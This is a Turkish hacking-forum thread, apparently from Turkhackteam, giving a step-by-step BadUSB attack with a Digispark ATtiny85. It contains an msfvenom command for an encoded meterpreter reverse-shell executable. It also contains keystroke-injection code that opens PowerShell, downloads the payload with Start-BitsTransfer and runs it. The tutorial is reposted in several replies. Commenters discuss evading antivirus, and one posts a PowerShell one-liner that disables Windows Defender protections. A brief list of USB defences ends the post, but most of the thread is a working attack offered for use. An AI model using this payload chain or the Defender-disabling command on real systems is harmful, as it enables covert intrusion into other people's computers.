Digispark BadUSB ile Cihazlara Sızmak 2024

MorfiNNN

Üye
16 Eyl 2018
64
17
Günümüzde dijital dünyada, güvenlik bir öncelik haline geldi. Ancak, ne yazık ki, teknolojinin ilerlemesiyle birlikte, siber saldırganlar da daha sofistike yöntemler geliştiriyorlar. İşte bu noktada, bilgi güvenliği uzmanlarının, saldırıları tespit etmek ve savunma stratejileri geliştirmek için aynı araçları kullanmaları gerekiyor. Bu noktada, Digispark gibi küçük ancak güçlü cihazlar, siber güvenlik uzmanlarının ve pentest uzmanlarının araç setlerinde önemli bir yer tutuyor.

Şimdi Digispark'ın gücünü keşfetmek için adım adım bir rehber sunacağız. Öncelikle, Metasploit Framework'ün nasıl kurulacağına ve bu güçlü aracın nasıl kullanılacağına odaklanacağız. Ardından, Digispark'ın nasıl kullanılabileceğini ve hedef sistemlere nasıl sızabileceğini göstereceğiz. Son olarak, savunma stratejilerini geliştirmek için bu tür saldırıları nasıl engelleyebileceğimize bir göz atacağız.
Hazırsanız, siber güvenlik dünyasına bir adım atalım ve Digispark ile cihazları nasıl sızabileceğimizi keşfedin.

- MSFVenom -

Öncelikle virüsümüzü oluşturmamız lazım. Bunun için metasploit kullanacağız. Genelde herkeste kurulu gelen bir araç için 0'dan kurulumunu göstermeye gerek olduğunu düşünmüyorum. Zaten Digispark kullanmak bir üst seviye olduğu için buraları öğrenilmiş varsayıyorum.
Öncelikle neler kullanabiliceğimize bakmak için msfvenom -h komutunu kullanıyoruz


  • -p : (Payload) :Oluşturulan zararlı dosya açıldıktan sonra çalışan kod parçası
  • -e : (Encoder) :Oluşturulan zararlı dosyayı antivirüslere yakalanmaması için şifreleyen araç seçiminin yapıldığı parametre
  • -i : (İterations) :Oluşturulan zararlı dosyayı kaç defa şifreyeleceğini seçeceğimiz parametre
  • -b : (Bad Chars) :Oluşturulan zararlı dosyanın çalışabilmesi için çıkaracağımız kötü karakterleri yazdığımız parametre
  • -f : (Format) :Oluşturulan zararlı dosyayı hangi formatta kaydeceğimizi belirlediğimiz parametre
  • -a : (Architecture) :Oluşturulan zararlı dosyanın hangi mimaride çalışacağını verdiğimiz parametre
  • --platform :Oluşturulan zararlı dosyanın hangi işletim sisteminde çalışacağını verdiğimiz parametre

Burda örnek amaçlı normal bir virüs oluşturacağım. Bunun için kullanacağımız komut:

msfvenom -p windows/meterpreter/reverse_tcp -e x64/xor -i 5 -a x64 --platform windows LHOST=192.168.1.1 LPORT=443 -f exe > tht.exe

Şimdi bunu BadUSB'ye taşımaya hazırız. Ama gelin önce Digispark BadUSB'den bahsedelim.

Digispark:

Digispark, bir ATtiny85 mikrodenetleyiciye dayalı olarak geliştirilmiş bir USB geliştirme kartıdır. İnanılmaz derecede küçük boyutuyla dikkat çeker ve USB üzerinden bilgisayarlarla iletişim kurabilir. ATtiny85, Arduino IDE'si ile programlanabilir ve bu sayede Digispark, Arduino kodunu çalıştırabilen küçük bir USB cihazı haline gelir. Digispark, hızlı prototipleme, taşınabilirlik ve düşük maliyet avantajları sağlar. Ayrıca, bu küçük cihaz, USB HID (Human Interface Device) emülatörü olarak da kullanılabilir, böylece klavye, fare gibi cihazlar gibi davranabilir ve bilgisayara veri gönderebilir.

ATtiny85:

ATtiny85, AVR mikrodenetleyiciler ailesinden bir üye olan 8-bit bir mikrodenetleyicidir. 8KB flash bellek, 512 byte SRAM ve 512 byte EEPROM'a sahiptir. Düşük güç tüketimi ve kompakt boyutu, ATtiny85'i portatif ve enerji verimli uygulamalar için ideal hale getirir. Bu mikrodenetleyici, genellikle küçük boyutlu projelerde ve entegre sistemlerde kullanılır ve birçok sensör ve cihazla uyumlu çalışabilir.

BadUSB:

BadUSB, aslında bir güvenlik açığıdır ve bir USB cihazının kötü amaçlı yazılımla programlanıp, normal bir USB aygıtı gibi davranmasını ifade eder. Bu, bir USB cihazının, bilgisayara bağlandığında otomatik olarak kötü amaçlı kodları çalıştırabileceği anlamına gelir. BadUSB saldırıları, genellikle hedef bilgisayarları enfekte etmek, bilgi çalmak veya diğer kötü amaçlı eylemleri gerçekleştirmek için kullanılır.

Digispark, ATtiny85'in esnekliği ve USB iletişim yetenekleri sayesinde BadUSB saldırılarında kullanılabilir. Programlanabilir doğası sayesinde, istenilen kötü amaçlı kodları yürütmek için kullanılabilir. Bu nedenle, Digispark genellikle güvenlik testleri ve sızma testleri sırasında kullanılan bir araçtır.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Virüsümüzü oluşturduğumuza göre bunu aktarmamız lazım. Bunun için de herhangi bir dosya upload sitesine girip indirme butonu linkini kopyalayacağız. Bunun nedeni Digispark'ın indirme butonlarına tıklayamıyor oluşu.


Daha sonra bunu aşağıdaki kodlarda <LINK> olarak belirtilen kısma yapıştırıyoruz.


#include "DigiKeyboard.h"
void setup() {
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(0);
}
void loop() {
int i = 1;
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_D, MOD_GUI_LEFT);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(200);
DigiKeyboard.print("powershell");
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print("Start-BitsTransfer <LINK>");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(8000);
DigiKeyboard.print("exit");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(250);
while (i == 1) {
DigiKeyboard.print("a.exe");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
i = 2;
}
}




Bu yazıyı gördükten sonra normal şekilde metasploit üzerinden dinlemeye alıyoruz. Usbyi hedef cihaza taktıktan sonra bağlantı gelmiş olucaktır. Peki bu nasıl oluyor?
Küçük cihazımızla virüsümüzü direkt olarak bilgisayarın içine windows powershell üzerinden yükleme yaptık. Bu sayede indirip anında çalıştırdı ve bu yaklaşık 10sn sürüyor.

Bundan korunmanın yolu var mı?

  1. USB Girişlerini Kısıtlama: Bilgisayarınızda USB girişlerini kısıtlamak, bilinmeyen veya güvenilmeyen USB cihazlarının otomatik olarak çalışmasını engelleyebilir. Bu, bilgisayarınızı güvenlik açısından daha korunaklı hale getirebilir.
  2. USB Güvenlik Yazılımları Kullanma: Bazı güvenlik yazılımları, bilgisayarınıza bağlanan USB cihazlarını otomatik olarak tarar ve potansiyel tehditleri tespit eder. Bu tür yazılımları kullanarak, bilgisayarınızı BadUSB saldırılarına karşı koruyabilirsiniz.
  3. Fiziksel Güvenlik Önlemleri: Bilgisayarınızın USB girişlerini fiziksel olarak korumak için, USB portlarına takılabilen veya kapatılabilen koruyucu kapaklar kullanabilirsiniz. Bu, bilgisayarınıza fiziksel erişimi kısıtlayarak, kötü niyetli kişilerin USB cihazlarını kolayca bağlamasını engelleyebilir.
Bu önlemler, Digispark BadUSB saldırılarına karşı korunmanıza yardımcı olabilir. Ancak, her durumda, güvenlik bilinci ve dikkatli davranışlar, en etkili savunma stratejileridir.

İyi forumlar.

 

Zilant

Yazılım Ekibi Asistanı
25 Tem 2021
198
180
Kazan Şehri - Tataristan
Ellerine sağlık, başarılı konu. Ben yaparken antivirusler dosyayı indirmeye izin vermemişti virüs olduğundan dolayı. Bunun çözümü var. Bunun da çözümünü bulup eklersen daha güzel olur :)
 

Blueteamforse

Asistan Moderatör
17 Ağu 2023
176
77
TÜRK IRKININ OLDUĞU HER YER
Günümüzde dijital dünyada, güvenlik bir öncelik haline geldi. Ancak, ne yazık ki, teknolojinin ilerlemesiyle birlikte, siber saldırganlar da daha sofistike yöntemler geliştiriyorlar. İşte bu noktada, bilgi güvenliği uzmanlarının, saldırıları tespit etmek ve savunma stratejileri geliştirmek için aynı araçları kullanmaları gerekiyor. Bu noktada, Digispark gibi küçük ancak güçlü cihazlar, siber güvenlik uzmanlarının ve pentest uzmanlarının araç setlerinde önemli bir yer tutuyor.

Şimdi Digispark'ın gücünü keşfetmek için adım adım bir rehber sunacağız. Öncelikle, Metasploit Framework'ün nasıl kurulacağına ve bu güçlü aracın nasıl kullanılacağına odaklanacağız. Ardından, Digispark'ın nasıl kullanılabileceğini ve hedef sistemlere nasıl sızabileceğini göstereceğiz. Son olarak, savunma stratejilerini geliştirmek için bu tür saldırıları nasıl engelleyebileceğimize bir göz atacağız.
Hazırsanız, siber güvenlik dünyasına bir adım atalım ve Digispark ile cihazları nasıl sızabileceğimizi keşfedin.

- MSFVenom -

Öncelikle virüsümüzü oluşturmamız lazım. Bunun için metasploit kullanacağız. Genelde herkeste kurulu gelen bir araç için 0'dan kurulumunu göstermeye gerek olduğunu düşünmüyorum. Zaten Digispark kullanmak bir üst seviye olduğu için buraları öğrenilmiş varsayıyorum.
Öncelikle neler kullanabiliceğimize bakmak için msfvenom -h komutunu kullanıyoruz


  • -p : (Payload) :Oluşturulan zararlı dosya açıldıktan sonra çalışan kod parçası
  • -e : (Encoder) :Oluşturulan zararlı dosyayı antivirüslere yakalanmaması için şifreleyen araç seçiminin yapıldığı parametre
  • -i : (İterations) :Oluşturulan zararlı dosyayı kaç defa şifreyeleceğini seçeceğimiz parametre
  • -b : (Bad Chars) :Oluşturulan zararlı dosyanın çalışabilmesi için çıkaracağımız kötü karakterleri yazdığımız parametre
  • -f : (Format) :Oluşturulan zararlı dosyayı hangi formatta kaydeceğimizi belirlediğimiz parametre
  • -a : (Architecture) :Oluşturulan zararlı dosyanın hangi mimaride çalışacağını verdiğimiz parametre
  • --platform :Oluşturulan zararlı dosyanın hangi işletim sisteminde çalışacağını verdiğimiz parametre

Burda örnek amaçlı normal bir virüs oluşturacağım. Bunun için kullanacağımız komut:

msfvenom -p windows/meterpreter/reverse_tcp -e x64/xor -i 5 -a x64 --platform windows LHOST=192.168.1.1 LPORT=443 -f exe > tht.exe

Şimdi bunu BadUSB'ye taşımaya hazırız. Ama gelin önce Digispark BadUSB'den bahsedelim.

Digispark:

Digispark, bir ATtiny85 mikrodenetleyiciye dayalı olarak geliştirilmiş bir USB geliştirme kartıdır. İnanılmaz derecede küçük boyutuyla dikkat çeker ve USB üzerinden bilgisayarlarla iletişim kurabilir. ATtiny85, Arduino IDE'si ile programlanabilir ve bu sayede Digispark, Arduino kodunu çalıştırabilen küçük bir USB cihazı haline gelir. Digispark, hızlı prototipleme, taşınabilirlik ve düşük maliyet avantajları sağlar. Ayrıca, bu küçük cihaz, USB HID (Human Interface Device) emülatörü olarak da kullanılabilir, böylece klavye, fare gibi cihazlar gibi davranabilir ve bilgisayara veri gönderebilir.

ATtiny85:

ATtiny85, AVR mikrodenetleyiciler ailesinden bir üye olan 8-bit bir mikrodenetleyicidir. 8KB flash bellek, 512 byte SRAM ve 512 byte EEPROM'a sahiptir. Düşük güç tüketimi ve kompakt boyutu, ATtiny85'i portatif ve enerji verimli uygulamalar için ideal hale getirir. Bu mikrodenetleyici, genellikle küçük boyutlu projelerde ve entegre sistemlerde kullanılır ve birçok sensör ve cihazla uyumlu çalışabilir.

BadUSB:

BadUSB, aslında bir güvenlik açığıdır ve bir USB cihazının kötü amaçlı yazılımla programlanıp, normal bir USB aygıtı gibi davranmasını ifade eder. Bu, bir USB cihazının, bilgisayara bağlandığında otomatik olarak kötü amaçlı kodları çalıştırabileceği anlamına gelir. BadUSB saldırıları, genellikle hedef bilgisayarları enfekte etmek, bilgi çalmak veya diğer kötü amaçlı eylemleri gerçekleştirmek için kullanılır.

Digispark, ATtiny85'in esnekliği ve USB iletişim yetenekleri sayesinde BadUSB saldırılarında kullanılabilir. Programlanabilir doğası sayesinde, istenilen kötü amaçlı kodları yürütmek için kullanılabilir. Bu nedenle, Digispark genellikle güvenlik testleri ve sızma testleri sırasında kullanılan bir araçtır.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Virüsümüzü oluşturduğumuza göre bunu aktarmamız lazım. Bunun için de herhangi bir dosya upload sitesine girip indirme butonu linkini kopyalayacağız. Bunun nedeni Digispark'ın indirme butonlarına tıklayamıyor oluşu.


Daha sonra bunu aşağıdaki kodlarda <LINK> olarak belirtilen kısma yapıştırıyoruz.


#include "DigiKeyboard.h"
void setup() {
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(0);
}
void loop() {
int i = 1;
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_D, MOD_GUI_LEFT);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(200);
DigiKeyboard.print("powershell");
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print("Start-BitsTransfer <LINK>");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(8000);
DigiKeyboard.print("exit");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(250);
while (i == 1) {
DigiKeyboard.print("a.exe");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
i = 2;
}
}




Bu yazıyı gördükten sonra normal şekilde metasploit üzerinden dinlemeye alıyoruz. Usbyi hedef cihaza taktıktan sonra bağlantı gelmiş olucaktır. Peki bu nasıl oluyor?
Küçük cihazımızla virüsümüzü direkt olarak bilgisayarın içine windows powershell üzerinden yükleme yaptık. Bu sayede indirip anında çalıştırdı ve bu yaklaşık 10sn sürüyor.

Bundan korunmanın yolu var mı?

  1. USB Girişlerini Kısıtlama: Bilgisayarınızda USB girişlerini kısıtlamak, bilinmeyen veya güvenilmeyen USB cihazlarının otomatik olarak çalışmasını engelleyebilir. Bu, bilgisayarınızı güvenlik açısından daha korunaklı hale getirebilir.
  2. USB Güvenlik Yazılımları Kullanma: Bazı güvenlik yazılımları, bilgisayarınıza bağlanan USB cihazlarını otomatik olarak tarar ve potansiyel tehditleri tespit eder. Bu tür yazılımları kullanarak, bilgisayarınızı BadUSB saldırılarına karşı koruyabilirsiniz.
  3. Fiziksel Güvenlik Önlemleri: Bilgisayarınızın USB girişlerini fiziksel olarak korumak için, USB portlarına takılabilen veya kapatılabilen koruyucu kapaklar kullanabilirsiniz. Bu, bilgisayarınıza fiziksel erişimi kısıtlayarak, kötü niyetli kişilerin USB cihazlarını kolayca bağlamasını engelleyebilir.
Bu önlemler, Digispark BadUSB saldırılarına karşı korunmanıza yardımcı olabilir. Ancak, her durumda, güvenlik bilinci ve dikkatli davranışlar, en etkili savunma stratejileridir.

İyi forumlar.

Elinize sağlık hocam.Gayey okunuşa uygun bir biçimde yazılmış tebrik ederim ben şuan türk vatandaşı olarak okurum bunu :D.
 

ARSEF7

Katılımcı Üye
29 Şub 2020
872
205
ARS3F
En sevdiğim konu :D ben de aldım hala düzgün bi şeyler kodlamadım şu attiny85i köşede bekliyor
 

MorfiNNN

Üye
16 Eyl 2018
64
17
En sevdiğim konu :D ben de aldım hala düzgün bi şeyler kodlamadım şu attiny85i köşede bekliyor
İlerde orta seviye konular açmayı düşünüyorum yardımcı olabilirsem ne mutlu bana

Ben attiny ile defenderi kapatmıştım ama fudlamak daha mantıklı gibi
Attiny ile defander kapatılmıyor, windows 10 da gerçek zamanlı koruma sadece manuel olarak kapatılabiliyor ağ korumasını kapatılabilir fakat bunun için de terminali yönetici olarak çalıştırmak gerekiyor fudlayınca dosya boyutu büyüyor 10 saniyelik işlem 1 dakikaya çıkar ama daha mantıklı olur
 
Moderatör tarafında düzenlendi:

Zilant

Yazılım Ekibi Asistanı
25 Tem 2021
198
180
Kazan Şehri - Tataristan
Attiny ile defander kapatılmıyor, windows 10 da gerçek zamanlı koruma sadece manuel olarak kapatılabiliyor ağ korumasını kapatılabilir fakat bunun için de terminali yönetici olarak çalıştırmak gerekiyor fudlayınca dosya boyutu büyüyor 10 saniyelik işlem 1 dakikaya çıkar ama daha mantıklı olur
Powershell i yönetici olarak açarsan kapatabiliyorsun.


powershell -command 'Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true'
 

KontraTC

Katılımcı Üye
16 Ağu 2023
290
50
Eline sağlık çok güzel konu, bootloader yükler yüklemez deneyeceğim
 

MorfiNNN

Üye
16 Eyl 2018
64
17
Powershell i yönetici olarak açarsan kapatabiliyorsun.


powershell -command 'Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true'
Digispark powershelli ya da cmdyi yönetici olarak çalıştıramaz üstelik guest hesabındaysa hiç bir türlü yapamaz. O yüzden sınırlı bi cihaz

Güzel konu tek sıkıntı attiny yok:(
80-150 fiyat aralığında robotik kodlama marketlerinden alabilirsin.
 
Moderatör tarafında düzenlendi:

ACE Veen

Uzman üye
4 Şub 2023
1,100
554
Belirsiz
Günümüzde dijital dünyada, güvenlik bir öncelik haline geldi. Ancak, ne yazık ki, teknolojinin ilerlemesiyle birlikte, siber saldırganlar da daha sofistike yöntemler geliştiriyorlar. İşte bu noktada, bilgi güvenliği uzmanlarının, saldırıları tespit etmek ve savunma stratejileri geliştirmek için aynı araçları kullanmaları gerekiyor. Bu noktada, Digispark gibi küçük ancak güçlü cihazlar, siber güvenlik uzmanlarının ve pentest uzmanlarının araç setlerinde önemli bir yer tutuyor.

Şimdi Digispark'ın gücünü keşfetmek için adım adım bir rehber sunacağız. Öncelikle, Metasploit Framework'ün nasıl kurulacağına ve bu güçlü aracın nasıl kullanılacağına odaklanacağız. Ardından, Digispark'ın nasıl kullanılabileceğini ve hedef sistemlere nasıl sızabileceğini göstereceğiz. Son olarak, savunma stratejilerini geliştirmek için bu tür saldırıları nasıl engelleyebileceğimize bir göz atacağız.
Hazırsanız, siber güvenlik dünyasına bir adım atalım ve Digispark ile cihazları nasıl sızabileceğimizi keşfedin.

- MSFVenom -

Öncelikle virüsümüzü oluşturmamız lazım. Bunun için metasploit kullanacağız. Genelde herkeste kurulu gelen bir araç için 0'dan kurulumunu göstermeye gerek olduğunu düşünmüyorum. Zaten Digispark kullanmak bir üst seviye olduğu için buraları öğrenilmiş varsayıyorum.
Öncelikle neler kullanabiliceğimize bakmak için msfvenom -h komutunu kullanıyoruz


  • -p : (Payload) :Oluşturulan zararlı dosya açıldıktan sonra çalışan kod parçası
  • -e : (Encoder) :Oluşturulan zararlı dosyayı antivirüslere yakalanmaması için şifreleyen araç seçiminin yapıldığı parametre
  • -i : (İterations) :Oluşturulan zararlı dosyayı kaç defa şifreyeleceğini seçeceğimiz parametre
  • -b : (Bad Chars) :Oluşturulan zararlı dosyanın çalışabilmesi için çıkaracağımız kötü karakterleri yazdığımız parametre
  • -f : (Format) :Oluşturulan zararlı dosyayı hangi formatta kaydeceğimizi belirlediğimiz parametre
  • -a : (Architecture) :Oluşturulan zararlı dosyanın hangi mimaride çalışacağını verdiğimiz parametre
  • --platform :Oluşturulan zararlı dosyanın hangi işletim sisteminde çalışacağını verdiğimiz parametre

Burda örnek amaçlı normal bir virüs oluşturacağım. Bunun için kullanacağımız komut:

msfvenom -p windows/meterpreter/reverse_tcp -e x64/xor -i 5 -a x64 --platform windows LHOST=192.168.1.1 LPORT=443 -f exe > tht.exe

Şimdi bunu BadUSB'ye taşımaya hazırız. Ama gelin önce Digispark BadUSB'den bahsedelim.

Digispark:

Digispark, bir ATtiny85 mikrodenetleyiciye dayalı olarak geliştirilmiş bir USB geliştirme kartıdır. İnanılmaz derecede küçük boyutuyla dikkat çeker ve USB üzerinden bilgisayarlarla iletişim kurabilir. ATtiny85, Arduino IDE'si ile programlanabilir ve bu sayede Digispark, Arduino kodunu çalıştırabilen küçük bir USB cihazı haline gelir. Digispark, hızlı prototipleme, taşınabilirlik ve düşük maliyet avantajları sağlar. Ayrıca, bu küçük cihaz, USB HID (Human Interface Device) emülatörü olarak da kullanılabilir, böylece klavye, fare gibi cihazlar gibi davranabilir ve bilgisayara veri gönderebilir.

ATtiny85:

ATtiny85, AVR mikrodenetleyiciler ailesinden bir üye olan 8-bit bir mikrodenetleyicidir. 8KB flash bellek, 512 byte SRAM ve 512 byte EEPROM'a sahiptir. Düşük güç tüketimi ve kompakt boyutu, ATtiny85'i portatif ve enerji verimli uygulamalar için ideal hale getirir. Bu mikrodenetleyici, genellikle küçük boyutlu projelerde ve entegre sistemlerde kullanılır ve birçok sensör ve cihazla uyumlu çalışabilir.

BadUSB:

BadUSB, aslında bir güvenlik açığıdır ve bir USB cihazının kötü amaçlı yazılımla programlanıp, normal bir USB aygıtı gibi davranmasını ifade eder. Bu, bir USB cihazının, bilgisayara bağlandığında otomatik olarak kötü amaçlı kodları çalıştırabileceği anlamına gelir. BadUSB saldırıları, genellikle hedef bilgisayarları enfekte etmek, bilgi çalmak veya diğer kötü amaçlı eylemleri gerçekleştirmek için kullanılır.

Digispark, ATtiny85'in esnekliği ve USB iletişim yetenekleri sayesinde BadUSB saldırılarında kullanılabilir. Programlanabilir doğası sayesinde, istenilen kötü amaçlı kodları yürütmek için kullanılabilir. Bu nedenle, Digispark genellikle güvenlik testleri ve sızma testleri sırasında kullanılan bir araçtır.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Virüsümüzü oluşturduğumuza göre bunu aktarmamız lazım. Bunun için de herhangi bir dosya upload sitesine girip indirme butonu linkini kopyalayacağız. Bunun nedeni Digispark'ın indirme butonlarına tıklayamıyor oluşu.


Daha sonra bunu aşağıdaki kodlarda <LINK> olarak belirtilen kısma yapıştırıyoruz.


#include "DigiKeyboard.h"
void setup() {
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(0);
}
void loop() {
int i = 1;
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_D, MOD_GUI_LEFT);
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(200);
DigiKeyboard.print("powershell");
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print("Start-BitsTransfer <LINK>");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(8000);
DigiKeyboard.print("exit");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(250);
while (i == 1) {
DigiKeyboard.print("a.exe");
DigiKeyboard.delay(250);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
i = 2;
}
}




Bu yazıyı gördükten sonra normal şekilde metasploit üzerinden dinlemeye alıyoruz. Usbyi hedef cihaza taktıktan sonra bağlantı gelmiş olucaktır. Peki bu nasıl oluyor?
Küçük cihazımızla virüsümüzü direkt olarak bilgisayarın içine windows powershell üzerinden yükleme yaptık. Bu sayede indirip anında çalıştırdı ve bu yaklaşık 10sn sürüyor.

Bundan korunmanın yolu var mı?

  1. USB Girişlerini Kısıtlama: Bilgisayarınızda USB girişlerini kısıtlamak, bilinmeyen veya güvenilmeyen USB cihazlarının otomatik olarak çalışmasını engelleyebilir. Bu, bilgisayarınızı güvenlik açısından daha korunaklı hale getirebilir.
  2. USB Güvenlik Yazılımları Kullanma: Bazı güvenlik yazılımları, bilgisayarınıza bağlanan USB cihazlarını otomatik olarak tarar ve potansiyel tehditleri tespit eder. Bu tür yazılımları kullanarak, bilgisayarınızı BadUSB saldırılarına karşı koruyabilirsiniz.
  3. Fiziksel Güvenlik Önlemleri: Bilgisayarınızın USB girişlerini fiziksel olarak korumak için, USB portlarına takılabilen veya kapatılabilen koruyucu kapaklar kullanabilirsiniz. Bu, bilgisayarınıza fiziksel erişimi kısıtlayarak, kötü niyetli kişilerin USB cihazlarını kolayca bağlamasını engelleyebilir.
Bu önlemler, Digispark BadUSB saldırılarına karşı korunmanıza yardımcı olabilir. Ancak, her durumda, güvenlik bilinci ve dikkatli davranışlar, en etkili savunma stratejileridir.

İyi forumlar.

eline sağlık
 

MorfiNNN

Üye
16 Eyl 2018
64
17
Link varmi ben aradığımda 300 500 arası çıkıyor
Ben burdan aldım.

Dostum kendi ellerimle yapmasam inanacağım sana ama reverse shell alabildim dediğim yöntemle :D
Deneyeyim yazarım

Ellerine sağlık, başarılı konu. Ben yaparken antivirusler dosyayı indirmeye izin vermemişti virüs olduğundan dolayı. Bunun çözümü var. Bunun da çözümünü bulup eklersen daha güzel olur :)
Fudlamak mı Firewall Bypass mı?
 
Moderatör tarafında düzenlendi:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.